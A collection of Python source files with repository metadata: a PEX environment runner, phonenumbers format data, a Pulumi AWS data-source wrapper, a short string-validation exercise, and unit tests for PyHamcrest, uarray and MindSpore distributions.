entry = EntryPoint.parse("run = {0}".format(spec))
# See https://pythonhosted.org/setuptools/history.html#id25 for rationale here.
if hasattr(entry, 'resolve'):
# setuptools >= 11.3
runner = entry.resolve()
else:
# setuptools < 11.3
runner = entry.load(require=False)
runner()
def cmdline(self, args=()):
"""The commandline to run this environment.
:keyword args: Additional arguments to be passed to the application being invoked by the
environment.
"""
cmds = [self._interpreter.binary]
cmds.append(self._pex)
cmds.extend(args)
return cmds
def run(self, args=(), with_chroot=False, blocking=True, setsid=False, **kw):
"""Run the PythonEnvironment in an interpreter in a subprocess.
:keyword args: Additional arguments to be passed to the application being invoked by the
environment.
:keyword with_chroot: Run with cwd set to the environment's working directory.
:keyword blocking: If true, return the return code of the subprocess.
If false, return the Popen object of the invoked subprocess.
:keyword setsid: If true, run the PEX in a separate operating system session.
Remaining keyword arguments are passed directly to subprocess.Popen.
"""
self.clean_environment()
cmdline = self.cmdline(args)
TRACER.log('PEX.run invoking %s' % ' '.join(cmdline))
process = subprocess.Popen(
cmdline,
cwd=self._pex if with_chroot else os.getcwd(),
preexec_fn=os.setsid if setsid else None,
**kw)
return process.wait() if blocking else process
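# A hedged usage sketch of the PEX class above. The import path assumes the
# standalone `pex` distribution layout, and "dist/app.pex" is a hypothetical
# archive path that must point at a real PEX file for this to run.
from pex.pex import PEX

pex = PEX("dist/app.pex")                 # wrap an existing PEX archive
print(" ".join(pex.cmdline(["--help"])))  # interpreter binary + archive + args
returncode = pex.run(args=["--help"])     # blocking=True (default) returns the exit code
print("exited with", returncode)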
---
blob_id: d3c94ed180a7288ebdba249b25efe1922d5e16f7 | directory_id: 54292bb222c6525217458e92ddacfc4e2635b83e | content_id: 7cda9598359526faf50dc6d50a4dc028c79533b4
repo_name: daviddrysdale/python-phonenumbers | path: /python/phonenumbers/data/alt_format_62.py | filename: alt_format_62.py | extension: py | length_bytes: 806
detected_licenses: ["Apache-2.0"] | license_type: permissive | gha_license_id: Apache-2.0
snapshot_id: 0d69b48033d1464c0a6c358274062f1db2ee8c4a | revision_id: 2f06ef6db2ca83f3856fbb8019a0c665f5971b13 | branch_name: refs/heads/dev
visit_date: 2023-08-31T09:37:20.570690 | revision_date: 2023-08-22T05:18:22 | committer_date: 2023-08-22T05:18:22
github_id: 1643611 | star_events_count: 2944 | fork_events_count: 406 | gha_event_created_at: 2023-08-08T06:49:07 | gha_created_at: 2011-04-21T03:06:38
gha_language: Python | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
---
"""Auto-generated file, do not edit by hand. 62 metadata"""
from ..phonemetadata import NumberFormat
PHONE_ALT_FORMAT_62 = [NumberFormat(pattern='(\\d{2})(\\d{3,4})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2[124]|[36]1']), NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{5})', format='\\1 \\2 \\3', leading_digits_pattern=['2[124]|[36]1']), NumberFormat(pattern='(\\d{2})(\\d{2})(\\d{3})(\\d{3})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['2[124]|[36]1']), NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['8[1-35-9]']), NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{5,6})', format='\\1 \\2 \\3', leading_digits_pattern=['8']), NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{2})(\\d{3})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['8'])]
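# A hedged illustration of how the first NumberFormat entry above could be
# applied to a bare national number with the standard `re` module. This
# bypasses the real phonenumbers formatting pipeline (leading-digit matching,
# validation), and the sample number is made up.
import re

pattern = '(\\d{2})(\\d{3,4})(\\d{4})'   # pattern of the first entry
fmt = r'\1 \2 \3'                        # its replacement template
digits = "2112345678"                    # hypothetical number matching leading digits "21"
if re.fullmatch(pattern, digits):
    print(re.sub(pattern, fmt, digits))  # prints: 21 1234 5678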
---
blob_id: ade31c7a395c3210c0945a847f22009ad5abee79 | directory_id: 1742b6719b988e5519373002305e31d28b8bd691 | content_id: c769b4bc884dd073a0f9f474c817736cfd2f638b
repo_name: pulumi/pulumi-aws | path: /sdk/python/pulumi_aws/oam/get_sinks.py | filename: get_sinks.py | extension: py | length_bytes: 2158
detected_licenses: ["MPL-2.0", "BSD-3-Clause", "Apache-2.0"] | license_type: permissive | gha_license_id: Apache-2.0
snapshot_id: 4f7fdb4a816c5ea357cff2c2e3b613c006e49f1a | revision_id: 42b0a0abdf6c14da248da22f8c4530af06e67b98 | branch_name: refs/heads/master
visit_date: 2023-08-03T23:08:34.520280 | revision_date: 2023-08-01T18:09:58 | committer_date: 2023-08-01T18:09:58
github_id: 97484940 | star_events_count: 384 | fork_events_count: 171 | gha_event_created_at: 2023-09-14T14:48:40 | gha_created_at: 2017-07-17T14:20:33
gha_language: Java | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
---
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetSinksResult',
'AwaitableGetSinksResult',
'get_sinks',
]
@pulumi.output_type
class GetSinksResult:
"""
A collection of values returned by getSinks.
"""
def __init__(__self__, arns=None, id=None):
if arns and not isinstance(arns, list):
raise TypeError("Expected argument 'arns' to be a list")
pulumi.set(__self__, "arns", arns)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def arns(self) -> Sequence[str]:
"""
Set of ARN of the Sinks.
"""
return pulumi.get(self, "arns")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
class AwaitableGetSinksResult(GetSinksResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSinksResult(
arns=self.arns,
id=self.id)
def get_sinks(opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSinksResult:
"""
Data source for managing an AWS CloudWatch Observability Access Manager Sinks.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.oam.get_sinks()
```
"""
__args__ = dict()
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('aws:oam/getSinks:getSinks', __args__, opts=opts, typ=GetSinksResult).value
return AwaitableGetSinksResult(
arns=pulumi.get(__ret__, 'arns'),
id=pulumi.get(__ret__, 'id'))
---
blob_id: 34d0c4af9e45566377e35ea32e452f54a0c97565 | directory_id: 3ca67d69abd4e74b7145b340cdda65532f90053b | content_id: fa9b20b4a111e7ec133d36eabf824fc242913358
repo_name: DKU-STUDY/Algorithm | path: /programmers/난이도별/level01.문자열_다루기_기본/HyeonJeong.py | filename: HyeonJeong.py | extension: py | length_bytes: 279
detected_licenses: [] | license_type: no_license | gha_license_id: null
snapshot_id: 19549516984b52a1c5cd73e1ed1e58f774d6d30e | revision_id: 6f78efdbefd8eedab24e43d74c7dae7f95c2893b | branch_name: refs/heads/master
visit_date: 2023-02-18T06:48:39.309641 | revision_date: 2023-02-09T07:16:14 | committer_date: 2023-02-09T07:16:14
github_id: 258455710 | star_events_count: 175 | fork_events_count: 49 | gha_event_created_at: 2023-02-09T07:16:16 | gha_created_at: 2020-04-24T08:42:27
gha_language: Python | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
---
def solution(s):
    # Returning early on inputs that fail a condition makes the code more efficient.
    if len(s) not in (4, 6):
        return False
    for i in s:
        if i not in "0123456789":
            return False
    return True
print(solution("a234"))
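# Illustrative calls for the corrected length-and-digits check above
# (expected results in the comments):
print(solution("1234"))    # True  -- 4 digits
print(solution("123456"))  # True  -- 6 digits
print(solution("12345"))   # False -- length is neither 4 nor 6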
---
blob_id: 791f2276117c68c9e329371791dff814b392b319 | directory_id: 5de2fda1683fd85ef9093d9cae4d18485e767da2 | content_id: 44b5292f033cb4a41e1a1c68c847d028e017e7eb
repo_name: hamcrest/PyHamcrest | path: /tests/hamcrest_unit_test/collection/is_empty_test.py | filename: is_empty_test.py | extension: py | length_bytes: 1709
detected_licenses: ["BSD-3-Clause"] | license_type: permissive | gha_license_id: NOASSERTION
snapshot_id: 073fd46145290f3e932513abdd5d0471d85e4c7b | revision_id: 8f160f83762e011af93194c38e84be9d91012fe9 | branch_name: refs/heads/main
visit_date: 2023-08-31T07:42:35.980553 | revision_date: 2023-08-30T20:27:48 | committer_date: 2023-08-30T20:27:48
github_id: 1194778 | star_events_count: 654 | fork_events_count: 116 | gha_event_created_at: 2023-08-30T20:27:49 | gha_created_at: 2010-12-24T02:55:56
gha_language: Python | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
---
from hamcrest.library.collection.is_empty import empty
from hamcrest_unit_test.matcher_test import MatcherTest
__author__ = "Chris Rose"
__copyright__ = "Copyright 2012 hamcrest.org"
__license__ = "BSD, see License.txt"
class LengthHaver(object):
def __init__(self, len_):
self._len = len_
def __len__(self):
return self._len
class EmptyCollectionTest(MatcherTest):
def testReturnsTrueForEmptyStandardCollections(self):
matcher = empty()
self.assert_matches("empty tuple", matcher, ())
self.assert_matches("empty list", matcher, [])
self.assert_matches("empty dictionary", matcher, {})
def testReturnsTrueForEmptyCollectionLike(self):
matcher = empty()
self.assert_matches("empty protocol object", matcher, LengthHaver(0))
def testReturnsFalseForNonEmptyStandardCollections(self):
matcher = empty()
self.assert_does_not_match("non-empty tuple", matcher, (1,))
self.assert_does_not_match("non-empty list", matcher, [1])
self.assert_does_not_match("empty dictionary", matcher, {1: 2})
def testReturnsFalseForNonEmptyCollectionLike(self):
matcher = empty()
self.assert_does_not_match("non-empty protocol object", matcher, LengthHaver(1))
def testHasReadableDescription(self):
self.assert_description("an empty collection", empty())
def testSuccessfulMatchDoesNotGenerateMismatchDescription(self):
self.assert_no_mismatch_description(empty(), [])
def testDescribeMismatch(self):
self.assert_mismatch_description("has 3 item(s)", empty(), [1, 2, 3])
self.assert_mismatch_description("does not support length", empty(), 1)
---
blob_id: 504d60577f7e55a15ee7f0b7e997a57afe74474e | directory_id: 8a40c574871927b120defd07b9b15bd78bceb09d | content_id: cacd9d192545b3a21d1e0a5716ef2b6c43f42b64
repo_name: Quansight-Labs/uarray | path: /uarray/tests/test_uarray.py | filename: test_uarray.py | extension: py | length_bytes: 15173
detected_licenses: ["BSD-3-Clause"] | license_type: permissive | gha_license_id: BSD-3-Clause
snapshot_id: c2f677e78a88b6012816fd04caf1d6e314947806 | revision_id: d895d6821589a9b63a960b9912282ba2b1ce9553 | branch_name: refs/heads/master
visit_date: 2022-09-02T19:26:55.283378 | revision_date: 2022-08-17T04:04:40 | committer_date: 2022-08-17T04:04:40
github_id: 145463966 | star_events_count: 101 | fork_events_count: 31 | gha_event_created_at: 2022-08-17T04:04:41 | gha_created_at: 2018-08-20T19:53:58
gha_language: C++ | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
---
import uarray as ua
import pickle
import pytest # type: ignore
@pytest.fixture(scope="function", autouse=True)
def cleanup_backends():
with ua.reset_state():
yield
class Backend:
__ua_domain__ = "ua_tests"
class DisableBackend:
def __init__(self, domain="ua_tests"):
self.__ua_domain__ = domain
self.active = True
self.ret = object()
def __ua_function__(self, f, a, kw):
if self.active:
return self.ret
raise ua.BackendNotImplementedError(self.__ua_domain__)
@pytest.fixture()
def nullary_mm():
return ua.generate_multimethod(lambda: (), lambda a, kw, d: (a, kw), "ua_tests")
def test_nestedbackend(nullary_mm):
obj = object()
be_outer = Backend()
be_outer.__ua_function__ = lambda f, a, kw: obj
def default(*a, **kw):
return nullary_mm(*a, **kw)
mm2 = ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), "ua_tests", default=default
)
be_inner = Backend()
def be2_ua_func(f, a, kw):
with ua.skip_backend(be_inner):
return f(*a, **kw)
be_inner.__ua_function__ = be2_ua_func
with ua.set_backend(be_outer), ua.set_backend(be_inner):
assert mm2() is obj
def _replacer(args, kwargs, dispatchables):
return (args, kwargs)
@ua.create_multimethod(_replacer, "ua_tests")
def pickle_mm():
return ()
def test_pickle_support():
unpickle_mm = pickle.loads(pickle.dumps(pickle_mm))
assert unpickle_mm is pickle_mm
def test_registration(nullary_mm):
obj = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
ua.register_backend(be)
assert nullary_mm() is obj
def test_global(nullary_mm):
obj = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
ua.set_global_backend(be)
assert nullary_mm() is obj
def test_ctx_before_global(nullary_mm):
obj = object()
obj2 = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: obj2
ua.set_global_backend(be)
with ua.set_backend(be2):
assert nullary_mm() is obj2
def test_global_before_registered(nullary_mm):
obj = object()
obj2 = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: obj2
ua.set_global_backend(be)
ua.register_backend(be2)
assert nullary_mm() is obj
def test_global_try_last(nullary_mm):
obj = object()
obj2 = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: obj2
ua.set_global_backend(be, try_last=True)
ua.register_backend(be2)
assert nullary_mm() is obj2
def test_global_only(nullary_mm):
obj = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: NotImplemented
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: obj
ua.set_global_backend(be, only=True)
ua.register_backend(be2)
with pytest.raises(ua.BackendNotImplementedError):
nullary_mm()
def test_clear_backends(nullary_mm):
obj = object()
obj2 = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: obj2
ua.set_global_backend(be)
ua.register_backend(be2)
ua.clear_backends(Backend.__ua_domain__, registered=True, globals=True)
with pytest.raises(ua.BackendNotImplementedError):
nullary_mm()
def test_function_attrs():
def extractor():
return ()
def replacer(a, kw, d):
return a, kw
def default():
return NotImplemented
mm = ua.generate_multimethod(extractor, replacer, "ua_tests", default=default)
assert mm.arg_extractor is extractor
assert mm.arg_replacer is replacer
assert mm.default is default
assert mm.domain == "ua_tests"
def test_raising_from_backend(nullary_mm):
def raise_(foo):
raise foo
Foo = ua.BackendNotImplementedError("Foo")
be = Backend()
be.__ua_function__ = lambda f, a, kw: raise_(Foo)
# BackendNotImplementedErrors are nested
with ua.set_backend(be):
with pytest.raises(ua.BackendNotImplementedError) as e:
nullary_mm()
assert (
e.value.args[0]
== "No selected backends had an implementation for this function."
)
assert type(e.value.args[1]) == tuple
assert e.value.args[1] == (be, Foo)
Bar = ua.BackendNotImplementedError("Bar")
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: raise_(Bar)
# Errors are in the order the backends were tried
with ua.set_backend(be), ua.set_backend(be2):
with pytest.raises(ua.BackendNotImplementedError) as e:
nullary_mm()
assert e.value.args[1] == (be2, Bar)
assert e.value.args[2] == (be, Foo)
be3 = Backend()
be3.__ua_function__ = lambda f, a, kw: "Success"
# Can succeed after a backend has raised BackendNotImplementedError
with ua.set_backend(be3), ua.set_backend(be):
assert nullary_mm() == "Success"
def test_nested():
be = Backend()
be.__ua_function__ = lambda f, a, kw: None
ctx = ua.set_backend(be)
with ctx, ctx:
pass
def test_invalid():
be1 = Backend()
be1.__ua_function__ = lambda f, a, kw: None
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: None
ctx1 = ua.set_backend(be1)
ctx2 = ua.set_backend(be2)
with pytest.raises(RuntimeError):
try:
ctx1.__enter__()
try:
ctx2.__enter__()
finally:
ctx1.__exit__(None, None, None)
finally:
ctx2.__exit__(None, None, None)
def test_skip_comparison(nullary_mm):
be1 = Backend()
be1.__ua_function__ = lambda f, a, kw: None
class Backend2(Backend):
@staticmethod
def __ua_function__(f, a, kw):
pass
def __eq__(self, other):
return other is self or other is be1
with pytest.raises(ua.BackendNotImplementedError):
with ua.set_backend(be1), ua.skip_backend(Backend2()):
nullary_mm()
def test_skip_raises(nullary_mm):
be1 = Backend()
be1.__ua_function__ = lambda f, a, kw: None
foo = Exception("Foo")
class Backend2(Backend):
@staticmethod
def __ua_function__(f, a, kw):
pass
def __eq__(self, other):
raise foo
with pytest.raises(Exception) as e:
with ua.set_backend(be1), ua.skip_backend(Backend2()):
nullary_mm()
assert e.value is foo
def test_getset_state(cleanup_backends):
ua.set_global_backend(Backend())
ua.register_backend(Backend())
with ua.set_backend(Backend()), ua.skip_backend(Backend()):
state = ua.get_state()
pstate = state._pickle()
assert pstate != ua.get_state()._pickle()
with ua.set_state(state):
assert pstate[:2] == ua.get_state()._pickle()[:2]
class ComparableBackend(Backend):
def __init__(self, obj):
super().__init__()
self.obj = obj
def __eq__(self, other):
return isinstance(other, ComparableBackend) and self.obj == other.obj
def __ne__(self, other):
return not (self == other)
def test_pickle_state():
ua.set_global_backend(ComparableBackend("a"))
ua.register_backend(ComparableBackend("b"))
with ua.set_backend(ComparableBackend("c")), ua.skip_backend(
ComparableBackend("d")
):
state = ua.get_state()
state_loaded = pickle.loads(pickle.dumps(state))
assert state._pickle() == state_loaded._pickle()
def test_hierarchical_backends():
mm = ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), "ua_tests.foo.bar"
)
subdomains = "ua_tests.foo.bar".split(".")
depth = len(subdomains)
mms = [
ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), ".".join(subdomains[: i + 1])
)
for i in range(depth)
]
be = [DisableBackend(".".join(subdomains[: i + 1])) for i in range(depth)]
ua.set_global_backend(be[1])
with pytest.raises(ua.BackendNotImplementedError):
mms[0]()
for i in range(1, depth):
assert mms[i]() is be[1].ret
ua.set_global_backend(be[0])
for i in range(depth):
assert mms[i]() is be[min(i, 1)].ret
ua.set_global_backend(be[2])
for i in range(depth):
assert mms[i]() is be[i].ret
be[2].active = False
for i in range(depth):
print(i)
assert mms[i]() is be[min(i, 1)].ret
be[1].active = False
for i in range(depth):
assert mms[i]() is be[0].ret
be[0].active = False
for i in range(depth):
with pytest.raises(ua.BackendNotImplementedError):
mms[i]()
# only=True prevents all further domain checking
be[0].active = True
be[1].active = True
with ua.set_backend(be[2], only=True), pytest.raises(ua.BackendNotImplementedError):
mms[2]()
def test_multidomain_backends():
n_domains = 2
be = DisableBackend(domain=["ua_tests" + str(i) for i in range(n_domains)])
mms = [
ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), "ua_tests" + str(i)
)
for i in range(n_domains)
]
def assert_no_backends():
for i in range(len(mms)):
with pytest.raises(ua.BackendNotImplementedError):
mms[i]()
def assert_backend_active(backend):
assert all(mms[i]() is backend.ret for i in range(len(mms)))
assert_no_backends()
with ua.set_backend(be):
assert_backend_active(be)
ua.set_global_backend(be)
assert_backend_active(be)
with ua.skip_backend(be):
assert_no_backends()
assert_backend_active(be)
for i in range(len(mms)):
ua.clear_backends(mms[i].domain, globals=True)
with pytest.raises(ua.BackendNotImplementedError):
mms[i]()
for j in range(i + 1, len(mms)):
assert mms[j]() is be.ret
assert_no_backends()
ua.register_backend(be)
assert_backend_active(be)
def test_determine_backend(nullary_mm):
class TypeA:
pass
class TypeB:
pass
mark = "determine_backend_test"
class TypeBackend:
__ua_domain__ = "ua_tests"
def __init__(self, my_type):
self.my_type = my_type
def __ua_convert__(self, dispatchables, coerce):
if not all(
type(d.value) is self.my_type and d.type is mark for d in dispatchables
):
return NotImplemented
return tuple(d.value for d in dispatchables)
def __ua_function__(self, func, args, kwargs):
return self.my_type
BackendA = TypeBackend(TypeA)
BackendB = TypeBackend(TypeB)
with ua.set_backend(BackendA), pytest.raises(ua.BackendNotImplementedError):
with ua.determine_backend(TypeB(), mark, domain="ua_tests"):
pass
with ua.set_backend(BackendA), ua.set_backend(BackendB):
with ua.determine_backend(TypeA(), mark, domain="ua_tests"):
assert nullary_mm() is TypeA
with ua.determine_backend(TypeB(), mark, domain="ua_tests"):
assert nullary_mm() is TypeB
# Has no __ua_convert__, so assumed to not accept the type
with ua.set_backend(DisableBackend()), pytest.raises(ua.BackendNotImplementedError):
with ua.determine_backend(TypeB(), mark, domain="ua_tests"):
pass
with ua.set_backend(BackendA), ua.set_backend(BackendB):
with pytest.raises(ua.BackendNotImplementedError):
with ua.determine_backend_multi(
[ua.Dispatchable(TypeA(), mark), ua.Dispatchable(TypeB(), mark)],
domain="ua_tests",
):
pass
with ua.determine_backend_multi(
[ua.Dispatchable(TypeA(), mark), ua.Dispatchable(TypeA(), mark)],
domain="ua_tests",
):
assert nullary_mm() is TypeA
def test_determine_backend_coerce(nullary_mm):
class TypeA:
pass
class TypeB:
pass
mark = "determine_backend_test"
class TypeBackend:
__ua_domain__ = "ua_tests"
def __init__(self, my_type):
self.my_type = my_type
def __ua_convert__(self, dispatchables, coerce):
if len(dispatchables) > 0:
print(dispatchables[0], coerce)
if coerce and all(d.coercible for d in dispatchables):
return tuple(self.my_type() for _ in dispatchables)
if not all(
type(d.value) is self.my_type and d.type is mark for d in dispatchables
):
return NotImplemented
return tuple(d.value for d in dispatchables)
def __ua_function__(self, func, args, kwargs):
return self.my_type
BackendA = TypeBackend(TypeA)
BackendB = TypeBackend(TypeB)
unary_mm = ua.generate_multimethod(
lambda a: (ua.Dispatchable(a, mark),), lambda a, kw, d: (d, kw), "ua_tests"
)
# coercion is not forced on the existing set backend
with ua.set_backend(BackendA), ua.set_backend(BackendB):
with ua.determine_backend(TypeA(), mark, domain="ua_tests", coerce=True):
assert nullary_mm() is TypeA
assert unary_mm(TypeB()) is TypeA
# But is allowed if the backend was set with coerce in the first place
with ua.set_backend(BackendA), ua.set_backend(BackendB, coerce=True):
with ua.determine_backend(TypeA(), mark, domain="ua_tests", coerce=True):
assert nullary_mm() is TypeB
assert unary_mm(TypeA()) is TypeB
def test_default(nullary_mm):
obj = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: NotImplemented
# If a backend returns NotImplemented, the default is called
def default1(*a, **kw):
return obj
mm1 = ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), "ua_tests", default=default1
)
with ua.set_backend(be):
assert mm1() is obj
# If all backends fail, the default is called again without a specific backend
num_calls = [0]
def default2(*a, **kw):
num_calls[0] = num_calls[0] + 1
raise ua.BackendNotImplementedError()
mm2 = ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), "ua_tests", default=default2
)
with ua.set_backend(be), pytest.raises(ua.BackendNotImplementedError):
mm2()
assert num_calls[0] == 2
# If the last backend is set as only or coerce, the last default call is skipped
num_calls[0] = 0
with ua.set_backend(be, only=True), pytest.raises(ua.BackendNotImplementedError):
mm2()
assert num_calls[0] == 1
num_calls[0] = 0
with ua.set_backend(be, coerce=True), pytest.raises(ua.BackendNotImplementedError):
mm2()
assert num_calls[0] == 1
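# A minimal end-to-end sketch of the protocol the tests above exercise: one
# multimethod, one backend, one dispatch. It assumes only APIs already used
# in this file (generate_multimethod, set_backend, __ua_domain__,
# __ua_function__).
import uarray as ua

demo_mm = ua.generate_multimethod(lambda: (), lambda a, kw, d: (a, kw), "ua_tests")

class DemoBackend:
    __ua_domain__ = "ua_tests"

    def __ua_function__(self, func, args, kwargs):
        # Receives the multimethod, its args, and kwargs; the return value
        # becomes the multimethod's result.
        return "handled by DemoBackend"

with ua.set_backend(DemoBackend()):
    assert demo_mm() == "handled by DemoBackend"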
---
blob_id: fef208a02f614e3bd34b75d95a5a4bb1428bf9a8 | directory_id: ffdc77394c5b5532b243cf3c33bd584cbdc65cb7 | content_id: fa8598b879eb63880699a7c9e240db655e109cf2
repo_name: mindspore-ai/mindspore | path: /tests/ut/python/nn/probability/distribution/test_categorical.py | filename: test_categorical.py | extension: py | length_bytes: 8014
detected_licenses: ["Apache-2.0", "LicenseRef-scancode-proprietary-license", "MPL-1.0", "OpenSSL", "LGPL-3.0-only", "LicenseRef-scancode-warranty-disclaimer", "BSD-3-Clause-Open-MPI", "MIT", "MPL-2.0-no-copyleft-exception", "NTP", "BSD-3-Clause", "GPL-1.0-or-later", "0BSD", "MPL-2.0", "LicenseRef-scancode-free-unknown", "AGPL-3.0-only", "Libpng", "MPL-1.1", "IJG", "GPL-2.0-only", "BSL-1.0", "Zlib", "LicenseRef-scancode-public-domain", "LicenseRef-scancode-python-cwi", "BSD-2-Clause", "LicenseRef-scancode-gary-s-brown", "LGPL-2.1-only", "LicenseRef-scancode-other-permissive", "Python-2.0", "LicenseRef-scancode-mit-nagy", "LicenseRef-scancode-other-copyleft", "LicenseRef-scancode-unknown-license-reference", "Unlicense"] | license_type: permissive | gha_license_id: Apache-2.0
snapshot_id: ca7d5bb51a3451c2705ff2e583a740589d80393b | revision_id: 54acb15d435533c815ee1bd9f6dc0b56b4d4cf83 | branch_name: refs/heads/master
visit_date: 2023-07-29T09:17:11.051569 | revision_date: 2023-07-17T13:14:15 | committer_date: 2023-07-17T13:14:15
github_id: 239714835 | star_events_count: 4178 | fork_events_count: 768 | gha_event_created_at: 2023-07-26T22:31:11 | gha_created_at: 2020-02-11T08:43:48
gha_language: C++ | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
---
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
Test nn.probability.distribution.Categorical.
"""
import numpy as np
import pytest
import mindspore.nn as nn
import mindspore.nn.probability.distribution as msd
from mindspore import dtype
from mindspore import Tensor
from mindspore import context
skip_flag = context.get_context("device_target") == "CPU"
def test_arguments():
"""
Args passing during initialization.
"""
c = msd.Categorical()
assert isinstance(c, msd.Distribution)
c = msd.Categorical([0.1, 0.9], dtype=dtype.int32)
assert isinstance(c, msd.Distribution)
def test_type():
with pytest.raises(TypeError):
msd.Categorical([0.1], dtype=dtype.bool_)
def test_name():
with pytest.raises(TypeError):
msd.Categorical([0.1], name=1.0)
def test_seed():
with pytest.raises(TypeError):
msd.Categorical([0.1], seed='seed')
def test_prob():
"""
Invalid probability.
"""
with pytest.raises(ValueError):
msd.Categorical([-0.1], dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical([1.1], dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical([0.0], dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical([1.0], dtype=dtype.int32)
def test_categorical_sum():
"""
Invalid probabilities.
"""
with pytest.raises(ValueError):
msd.Categorical([[0.1, 0.2], [0.4, 0.6]], dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical([[0.5, 0.7], [0.6, 0.6]], dtype=dtype.int32)
def test_rank():
    """
    Rank dimension less than 1.
    """
with pytest.raises(ValueError):
msd.Categorical(0.2, dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical(np.array(0.3).astype(np.float32), dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical(
Tensor(np.array(0.3).astype(np.float32)), dtype=dtype.int32)
class CategoricalProb(nn.Cell):
"""
Categorical distribution: initialize with probs.
"""
def __init__(self):
super(CategoricalProb, self).__init__()
self.c = msd.Categorical([0.7, 0.3], dtype=dtype.int32)
def construct(self, value):
prob = self.c.prob(value)
log_prob = self.c.log_prob(value)
cdf = self.c.cdf(value)
log_cdf = self.c.log_cdf(value)
sf = self.c.survival_function(value)
log_sf = self.c.log_survival(value)
return prob + log_prob + cdf + log_cdf + sf + log_sf
@pytest.mark.skipif(skip_flag, reason="not support running in CPU")
def test_categorical_prob():
"""
Test probability functions: passing value through construct.
"""
net = CategoricalProb()
value = Tensor([0, 1, 0, 1, 0], dtype=dtype.float32)
ans = net(value)
assert isinstance(ans, Tensor)
class CategoricalProb1(nn.Cell):
"""
Categorical distribution: initialize without probs.
"""
def __init__(self):
super(CategoricalProb1, self).__init__()
self.c = msd.Categorical(dtype=dtype.int32)
def construct(self, value, probs):
prob = self.c.prob(value, probs)
log_prob = self.c.log_prob(value, probs)
cdf = self.c.cdf(value, probs)
log_cdf = self.c.log_cdf(value, probs)
sf = self.c.survival_function(value, probs)
log_sf = self.c.log_survival(value, probs)
return prob + log_prob + cdf + log_cdf + sf + log_sf
@pytest.mark.skipif(skip_flag, reason="not support running in CPU")
def test_categorical_prob1():
"""
Test probability functions: passing value/probs through construct.
"""
net = CategoricalProb1()
value = Tensor([0, 1, 0, 1, 0], dtype=dtype.float32)
probs = Tensor([0.3, 0.7], dtype=dtype.float32)
ans = net(value, probs)
assert isinstance(ans, Tensor)
class CategoricalKl(nn.Cell):
"""
Test class: kl_loss between Categorical distributions.
"""
def __init__(self):
super(CategoricalKl, self).__init__()
self.c1 = msd.Categorical([0.2, 0.2, 0.6], dtype=dtype.int32)
self.c2 = msd.Categorical(dtype=dtype.int32)
def construct(self, probs_b, probs_a):
kl1 = self.c1.kl_loss('Categorical', probs_b)
kl2 = self.c2.kl_loss('Categorical', probs_b, probs_a)
return kl1 + kl2
@pytest.mark.skipif(skip_flag, reason="not support running in CPU")
def test_kl():
"""
Test kl_loss function.
"""
ber_net = CategoricalKl()
probs_b = Tensor([0.3, 0.1, 0.6], dtype=dtype.float32)
probs_a = Tensor([0.7, 0.2, 0.1], dtype=dtype.float32)
ans = ber_net(probs_b, probs_a)
